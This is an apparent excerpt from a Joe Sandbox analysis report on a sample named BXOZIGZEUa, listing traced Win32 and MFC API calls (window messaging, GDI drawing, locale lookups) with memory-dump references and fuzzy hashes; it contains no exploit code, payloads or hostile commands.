                                                                  • PeekMessageW.USER32(?,00000000,0000000F,0000000F,00000000), ref: 001FC0ED
                                                                  • GetCapture.USER32 ref: 001FC0F9
                                                                  • SetCapture.USER32(?), ref: 001FC105
                                                                  • GetCapture.USER32 ref: 001FC111
                                                                  • GetWindowRect.USER32(?,?), ref: 001FC13B
                                                                  • SetCursorPos.USER32(?,?), ref: 001FC15E
                                                                  • GetCapture.USER32 ref: 001FC164
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001FC17C
                                                                  • DispatchMessageW.USER32(?), ref: 001FC1A2
                                                                  • ReleaseCapture.USER32 ref: 001FC1E0
                                                                  • IsWindow.USER32(?), ref: 001FC1E9
                                                                  • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 001FC202
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Capture$RectWindow$Dispatch$CursorInflateInvalidatePeekReleaseSendUpdate
                                                                  • String ID:
                                                                  • API String ID: 4077352625-0
                                                                  • Opcode ID: 018c60044e81811bf432c991a6f3b3c94d8c25106a009311c7d4cc32474ca085
                                                                  • Instruction ID: a747d9ac605186126e5b2edd93b62117a226938b1fffdd9f2160686e78e9015e
                                                                  • Opcode Fuzzy Hash: 018c60044e81811bf432c991a6f3b3c94d8c25106a009311c7d4cc32474ca085
                                                                  • Instruction Fuzzy Hash: FF913E7690420DAFCB14EFE4ED89DBEBBB9EB54310B250429F605E7251DB30AD40DB91
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00275943
                                                                  • GetCursorPos.USER32(?), ref: 002759F5
                                                                  • IsRectEmpty.USER32(00000000), ref: 00275A29
                                                                  • IsRectEmpty.USER32(?), ref: 00275A4F
                                                                  • IsRectEmpty.USER32(00000000), ref: 00275A6B
                                                                  • GetWindowRect.USER32(?,00000000), ref: 00275A91
                                                                  • SetRectEmpty.USER32(?), ref: 00275B48
                                                                    • Part of subcall function 001C8E6A: _malloc.LIBCMT ref: 001C8E88
                                                                  • GetWindowRect.USER32(?,00000000), ref: 00275AC5
                                                                  • PtInRect.USER32(00000000,?,00000000), ref: 00275B05
                                                                  • OffsetRect.USER32(00000000,?,00000000), ref: 00275B1D
                                                                    • Part of subcall function 0022AB47: __EH_prolog3.LIBCMT ref: 0022AB4E
                                                                    • Part of subcall function 0022AB47: SetRectEmpty.USER32(?), ref: 0022AC55
                                                                    • Part of subcall function 0022AB47: SetRectEmpty.USER32(?), ref: 0022AC5E
                                                                  • OffsetRect.USER32(00000000,?,?), ref: 00275CA7
                                                                  • IsRectEmpty.USER32(?), ref: 00275CCC
                                                                  • IsRectEmpty.USER32(?), ref: 00275CF1
                                                                  • PtInRect.USER32(00000000,?,?), ref: 00275D01
                                                                  • OffsetRect.USER32(00000000,?,?), ref: 00275D2A
                                                                  • IsRectEmpty.USER32(?), ref: 00275D41
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Empty$Offset$Window$CursorH_prolog3H_prolog3__malloc
                                                                  • String ID:
                                                                  • API String ID: 1330315114-0
                                                                  • Opcode ID: 84449fd0c3d5ccf4dafdcdb40afa257075d9b8ff42aa54412cd62c5ffa564d7b
                                                                  • Instruction ID: 1263b1c5fe6452b8d302db5dc697d899e67063a9737ffc7f1a9760a5b41411d6
                                                                  • Opcode Fuzzy Hash: 84449fd0c3d5ccf4dafdcdb40afa257075d9b8ff42aa54412cd62c5ffa564d7b
                                                                  • Instruction Fuzzy Hash: 23E16E71910629DFCF25DFA4C888AAEBBB9FF04700F148169E909EB259DB70D951CF90
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 002034C9
                                                                  • CreateRectRgnIndirect.GDI32(?), ref: 00203506
                                                                  • CopyRect.USER32(?,?), ref: 0020351C
                                                                  • InflateRect.USER32(?,?,?), ref: 00203532
                                                                  • IntersectRect.USER32(?,?,?), ref: 00203540
                                                                  • CreateRectRgnIndirect.GDI32(?), ref: 0020354A
                                                                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0020355F
                                                                    • Part of subcall function 001F0174: CombineRgn.GDI32(?,00000003,?,?), ref: 001F0199
                                                                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 002035C7
                                                                  • SetRectRgn.GDI32(?,0000000A,?,?,?), ref: 002035E4
                                                                  • CopyRect.USER32(?,0000000A), ref: 002035EF
                                                                  • InflateRect.USER32(?,?,?), ref: 00203605
                                                                  • IntersectRect.USER32(?,?,0000000A), ref: 00203611
                                                                  • SetRectRgn.GDI32(?,?,?,?,0000000A), ref: 00203626
                                                                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00203652
                                                                    • Part of subcall function 00203324: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,0020358B), ref: 0020336D
                                                                    • Part of subcall function 00203324: CreatePatternBrush.GDI32(00000000), ref: 0020337A
                                                                    • Part of subcall function 00203324: DeleteObject.GDI32(00000000), ref: 00203386
                                                                    • Part of subcall function 001D06C9: SelectObject.GDI32(?,00000000), ref: 001D06EF
                                                                    • Part of subcall function 001D06C9: SelectObject.GDI32(?,?), ref: 001D0705
                                                                  • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 002036C3
                                                                  • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00203718
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3_Pattern
                                                                  • String ID:
                                                                  • API String ID: 3107162742-0
                                                                  • Opcode ID: 34c3ff191d176d771cdd45cd8f1d24fd3626716fd7295d98738a7b1674188eb0
                                                                  • Instruction ID: 3ae3c1a5843b8d7f43c414e76038f316534e16c2121b6555876847d82fe01818
                                                                  • Opcode Fuzzy Hash: 34c3ff191d176d771cdd45cd8f1d24fd3626716fd7295d98738a7b1674188eb0
                                                                  • Instruction Fuzzy Hash: 06A113B1900219AFCF05EFE4EC99EFEBBB9BF18300F14401AF506A6251DB359A55CB64
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000201,00000201,00000001), ref: 0021C82B
                                                                  • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 0021C848
                                                                  • ReleaseCapture.USER32 ref: 0021C883
                                                                  • GetMessageW.USER32(?,00000000,000000A1,000000A1), ref: 0021C892
                                                                  • PeekMessageW.USER32(?,00000000,?,?,00000001), ref: 0021C8A6
                                                                  • DispatchMessageW.USER32(?), ref: 0021C8AD
                                                                  • DispatchMessageW.USER32(?), ref: 0021C958
                                                                  • GetCursorPos.USER32(?), ref: 0021C962
                                                                  • PeekMessageW.USER32(?,00000000,?,?,00000001), ref: 0021C983
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Peek$Dispatch$CaptureCursorReleaseSend
                                                                  • String ID:
                                                                  • API String ID: 597789953-0
                                                                  • Opcode ID: 1d9db196dc86268ec42f6c79bf436e852c89a4594c011ae1176a6e4e7561c99a
                                                                  • Instruction ID: c517f67cf95f1e3216396fce905c4d5d95bb7e7fa137b539041505132393e5b7
                                                                  • Opcode Fuzzy Hash: 1d9db196dc86268ec42f6c79bf436e852c89a4594c011ae1176a6e4e7561c99a
                                                                  • Instruction Fuzzy Hash: 8551AE796A0241ABEB215F64DCC8EFFB6ECEB65B00F304425F542D6190C675D9D0CB61
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00233706
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0023373C
                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 00233753
                                                                  • SelectObject.GDI32(?,?), ref: 0023377F
                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 002337A1
                                                                  • SelectObject.GDI32(?,00000000), ref: 002337B4
                                                                  • CreateCompatibleDC.GDI32(?), ref: 002337C7
                                                                  • SelectObject.GDI32(?,?), ref: 002337D8
                                                                  • SelectObject.GDI32(?,00000000), ref: 002337E9
                                                                  • DeleteObject.GDI32(?), ref: 002337EE
                                                                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0023381A
                                                                  • GetPixel.GDI32(?,?,?), ref: 00233839
                                                                  • SetPixel.GDI32(?,?,?,00000000), ref: 00233880
                                                                  • SelectObject.GDI32(?,?), ref: 002338A4
                                                                  • SelectObject.GDI32(?,00000000), ref: 002338AC
                                                                  • DeleteObject.GDI32(?), ref: 002338B4
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Object$Select$CompatibleCreate$DeletePixel$BitmapH_prolog3
                                                                  • String ID:
                                                                  • API String ID: 3639146769-0
                                                                  • Opcode ID: b38d23fce107efe7cf79d2d476c2ca6f958ffb7389a1640c45243f1db5bb5602
                                                                  • Instruction ID: abafe44a88be8aa10ba9ed5a3fa7f1b0aeb37b533435f38882157b8dbb5cf44f
                                                                  • Opcode Fuzzy Hash: b38d23fce107efe7cf79d2d476c2ca6f958ffb7389a1640c45243f1db5bb5602
                                                                  • Instruction Fuzzy Hash: 6A51F4B181024AEBCF12DFA4DD49AEEBB72FF18310F204129F515A61A0DB715B66DB60
                                                                  APIs
                                                                    • Part of subcall function 001C94E4: ActivateActCtx.KERNEL32(?,?,0031BB48,00000010,001C95B9,KERNEL32.DLL), ref: 001C9504
                                                                  • GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 001C95C8
                                                                  • _memset.LIBCMT ref: 001C95F4
                                                                  • _wcstoul.LIBCMT ref: 001C963C
                                                                    • Part of subcall function 002BF54B: wcstoxl.LIBCMT ref: 002BF55B
                                                                  • _wcslen.LIBCMT ref: 001C965D
                                                                    • Part of subcall function 002BE629: __getptd_noexit.LIBCMT ref: 002BE629
                                                                  • GetUserDefaultUILanguage.KERNEL32 ref: 001C966D
                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 001C9694
                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 001C96A3
                                                                  • GetSystemDefaultUILanguage.KERNEL32 ref: 001C96AC
                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 001C96C8
                                                                  • ConvertDefaultLocale.KERNEL32(?), ref: 001C96D7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Default$ConvertLocale$Language$ActivateAddressProcSystemUser__getptd_noexit_memset_wcslen_wcstoulwcstoxl
                                                                  • String ID: GetThreadPreferredUILanguages$KERNEL32.DLL$e
                                                                  • API String ID: 1566020816-2285706205
                                                                  • Opcode ID: 7bac7fa92c504d78bf1b0325b5d14f6bfa3e4df0e8a43ea2dbe33c3e4c03edf7
                                                                  • Instruction ID: 87f17a7daf16f7547d803c86b1f502acd544c8baf52cfe2f8d5aa0cf6ff45678
                                                                  • Opcode Fuzzy Hash: 7bac7fa92c504d78bf1b0325b5d14f6bfa3e4df0e8a43ea2dbe33c3e4c03edf7
                                                                  • Instruction Fuzzy Hash: F7418371911228ABDB21AF65DC89FED77B8AB58710F4104AEE909E7180DB74DE81CF90
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 00216AC5
                                                                  • GetClientRect.USER32(?,?), ref: 00216AFF
                                                                  • GetWindowRect.USER32(?,?), ref: 00216B5A
                                                                  • EqualRect.USER32(?,?), ref: 00216B68
                                                                  • GetWindowRect.USER32(?,?), ref: 00216B8E
                                                                    • Part of subcall function 001D701F: AdjustWindowRectEx.USER32(?,00000000,00000000,00000000), ref: 001D7045
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$AdjustClientEqual
                                                                  • String ID:
                                                                  • API String ID: 2779716228-0
                                                                  • Opcode ID: 297be2ad21109fc3d3ed8a6108f1e127cd4c1a9a9ab3e06d33892ddb7125c5e5
                                                                  • Instruction ID: 5c94cbae85e1885301f0903fcfdaea5b1ba6ab694f476341909b6285bd67f1b0
                                                                  • Opcode Fuzzy Hash: 297be2ad21109fc3d3ed8a6108f1e127cd4c1a9a9ab3e06d33892ddb7125c5e5
                                                                  • Instruction Fuzzy Hash: 93D1F471E1021AAFCF01DFE8C9889EEBBB9FF48700F14411AE505AB254DB70AA51CF90
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 0020EB4E
                                                                  • InflateRect.USER32(?,00000000,00000000), ref: 0020EB7D
                                                                  • SetRectEmpty.USER32(?), ref: 0020EC1B
                                                                  • SetRectEmpty.USER32(?), ref: 0020EC24
                                                                  • GetSystemMetrics.USER32(00000002), ref: 0020EC45
                                                                  • KillTimer.USER32(?,00000002), ref: 0020ECDF
                                                                  • EqualRect.USER32(?,?), ref: 0020ED01
                                                                  • EqualRect.USER32(?,?), ref: 0020ED12
                                                                  • EqualRect.USER32(?,?), ref: 0020ED63
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 0020ED7C
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 0020ED84
                                                                  • EqualRect.USER32(?,?), ref: 0020ED98
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 0020EDAB
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 0020EDB3
                                                                  • UpdateWindow.USER32(?), ref: 0020EDC6
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$EqualInvalidate$Empty$ClientInflateKillMetricsSystemTimerUpdateWindow
                                                                  • String ID:
                                                                  • API String ID: 2140115980-0
                                                                  • Opcode ID: d451b8a302acf0ec6a085c9a83be076bb7cf39a729d9e99a3a90dd371dd625fd
                                                                  • Instruction ID: b04d75dc3b4276d73980c7c9917d064ffccfd6367098a63717b0065538193440
                                                                  • Opcode Fuzzy Hash: d451b8a302acf0ec6a085c9a83be076bb7cf39a729d9e99a3a90dd371dd625fd
                                                                  • Instruction Fuzzy Hash: C191F77191021ADFCF11DFA4D984AEE77B9BF08300F1545B6EC09AB256DBB1A981CB60
                                                                  APIs
                                                                  • GetDlgCtrlID.USER32(?), ref: 00207D19
                                                                  • GetDlgItem.USER32(?,?), ref: 00207DA3
                                                                  • ShowWindow.USER32(00000000,00000000,?,?), ref: 00207DAE
                                                                  • GetMenu.USER32(?), ref: 00207DC0
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00207DDB
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  • GetDlgItem.USER32(?,0000E900), ref: 00207E18
                                                                  • SetWindowLongW.USER32(00000000,000000F4,0000EA21), ref: 00207E35
                                                                  • GetDlgItem.USER32(?,0000EA21), ref: 00207E4E
                                                                  • GetDlgItem.USER32(?,0000E900), ref: 00207E64
                                                                  • SetWindowLongW.USER32(00000000,000000F4,0000EA21), ref: 00207E76
                                                                  • SetWindowLongW.USER32(?,000000F4,0000E900), ref: 00207E82
                                                                  • InvalidateRect.USER32(00000000,00000000,00000001,?,?), ref: 00207E95
                                                                  • SetMenu.USER32(?,00000000), ref: 00207EAC
                                                                  • GetDlgItem.USER32(?,00000000), ref: 00207EF3
                                                                  • ShowWindow.USER32(?,00000005), ref: 00207F01
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ItemWindow$Long$InvalidateMenuRectShow$CtrlException@8H_prolog3Throw
                                                                  • String ID:
                                                                  • API String ID: 3935238147-0
                                                                  • Opcode ID: 6562c14dce45091aadfdfdc138f7b7bf564ee62614e20af380ab5323caa8c44e
                                                                  • Instruction ID: 018727a5464c7126a7d8fb974654e04b9231bb9f3eaacea1a6fca5461da90955
                                                                  • Opcode Fuzzy Hash: 6562c14dce45091aadfdfdc138f7b7bf564ee62614e20af380ab5323caa8c44e
                                                                  • Instruction Fuzzy Hash: 0D815E30A14701DFDB219F24C88CAAABBF5FF49710F244969E59A9B2A1DB71ED50CF40
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00206109
                                                                    • Part of subcall function 001C8E6A: _malloc.LIBCMT ref: 001C8E88
                                                                    • Part of subcall function 0028FF85: __EH_prolog3.LIBCMT ref: 0028FF8C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3$_malloc
                                                                  • String ID: MFCButton$MFCColorButton$MFCEditBrowse$MFCFontComboBox$MFCLink$MFCMaskedEdit$MFCMenuButton$MFCPropertyGrid$MFCShellList$MFCShellTree$MFCVSListBox
                                                                  • API String ID: 1683881009-2110171958
                                                                  • Opcode ID: e78a35ba3f1539833dd2ec4be19116c21935ca3571344e631df29098d7ccdf8c
                                                                  • Instruction ID: 37c81e7b3dd34d9cc2319d6214b0ee3db18e229468a7fea1715e24ebc7106681
                                                                  • Opcode Fuzzy Hash: e78a35ba3f1539833dd2ec4be19116c21935ca3571344e631df29098d7ccdf8c
                                                                  • Instruction Fuzzy Hash: B651F730A64355DADF54FBB498A6BBD66A02F38F04F54406DF41E961C3EFB08B708692
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 00233FF4
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00234026
                                                                  • GetObjectW.GDI32(?,00000054,?), ref: 0023405E
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 002340F4
                                                                  • SelectObject.GDI32(?,?), ref: 00234113
                                                                  • GetPixel.GDI32(?,?,00000000), ref: 002341A0
                                                                  • GetPixel.GDI32(?,?,00000000), ref: 002341B2
                                                                  • SetPixel.GDI32(?,?,00000000,00000000), ref: 002341C1
                                                                  • SetPixel.GDI32(?,?,00000000,?), ref: 002341D3
                                                                  • SelectObject.GDI32(?,?), ref: 0023420A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectPixel$Select$CompatibleCreateH_prolog3_
                                                                  • String ID: $
                                                                  • API String ID: 1266819874-227171996
                                                                  • Opcode ID: 1a7188d7252f046ae0aba007eaec15891ab8af2cb04b6070f9fab2e91eafdfd7
                                                                  • Instruction ID: 83145c8bbc382ff836ccc821c3dfcf5dcd6740446d172e1a65d6a711a01b44b2
                                                                  • Opcode Fuzzy Hash: 1a7188d7252f046ae0aba007eaec15891ab8af2cb04b6070f9fab2e91eafdfd7
